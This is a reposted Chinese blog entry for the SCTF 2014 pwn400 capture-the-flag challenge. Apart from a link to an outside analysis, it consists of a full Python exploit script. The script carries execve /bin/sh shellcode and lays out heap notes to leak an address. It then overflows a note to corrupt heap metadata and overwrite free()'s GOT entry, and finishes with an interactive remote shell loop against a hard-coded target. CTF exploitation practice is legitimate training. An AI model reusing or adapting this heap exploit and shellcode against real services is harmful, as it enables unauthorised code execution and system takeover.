sctf pwn400
生活随笔
收集整理的這篇文章主要介紹了
sctf pwn400
小編覺得挺不錯的,現在分享給大家,幫大家做個參考.
這個題目在這個鏈接中分析得很透徹,不再多余地寫了。http://bruce30262.logdown.com/posts/245613-sctf-2014-pwn400
exploit:
from socket import * import struct import timeshellcode = "\x90\x90\x90\x90\x90\x90"+"\xeb\x08"+"AAAA"+"\x90"*10+"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x59\x50\x5a\xb0\x0b\xcd\x80" sock = socket(AF_INET, SOCK_STREAM) sock.connect(("192.168.200.7", 10001))time.sleep(1) print sock.recv(1024) #new two note: 2, 1 for i in xrange(2):sock.send('1\n')time.sleep(1)sock.recv(1024)sock.send(str(i+1) + '\n')time.sleep(1)sock.recv(1024)sock.send(str(i+1) + '\n')time.sleep(1)sock.recv(1024)sock.send(str(i+1) + '\n')time.sleep(1)sock.recv(1024) #new the third note: 3 sock.send('1\n') time.sleep(1) sock.recv(1024) sock.send('3\n') time.sleep(1) sock.recv(1024) sock.send('3\n') time.sleep(1) sock.recv(1024) time.sleep(1) #store shellcode in note 3 sock.send(shellcode+"\n")#get the note 1's address sock.send('3\n') time.sleep(1) print sock.recv(100) sock.send('1\n') time.sleep(1) note1_addr = sock.recv(2048) while note1_addr.find('location:') == -1:note1_addr += sock.recv(2048) print note1_addr note1_addr = note1_addr[note1_addr.find('location:') + 11:] note1_addr = note1_addr[:note1_addr.find('\n')] addr1 = int(note1_addr, 16) print addr1 #note 2's address addr2 = addr1 + 0x170 #note 3's address addr3 = addr2 + 0x170 #shellcode's address addr_shellcode = struct.pack("<I", addr3 + 0x6c) #free()'s Got: 0x0804a450 exploit = "A"*256+"BBBB"+struct.pack("<I",addr2)+addr_shellcode+"\x4c\xa4\x04\x08"#edit note 1 sock.send("4\n") time.sleep(1) print sock.recv(1024) sock.send("1\n") time.sleep(1) print sock.recv(1024) sock.send(exploit+"\n") time.sleep(1) print sock.recv(1024)#delete node 2 sock.send("5\n") time.sleep(1) sock.recv(1024) time.sleep(1) sock.send(hex(addr2)[2:10]+'\n') time.sleep(1) sock.recv(1024)while True:sock.send(raw_input('$ ') + '\n')time.sleep(1)temp = sock.recv(2048)print temp?
轉載于:https://www.cnblogs.com/wangaohui/p/4395133.html
總結
以上是生活随笔為你收集整理的sctf pwn400的全部內容,希望文章能夠幫你解決所遇到的問題。
- 上一篇: 将字符串转换为列显示
- 下一篇: 华东医药与阿里健康达成合作,首款国产利拉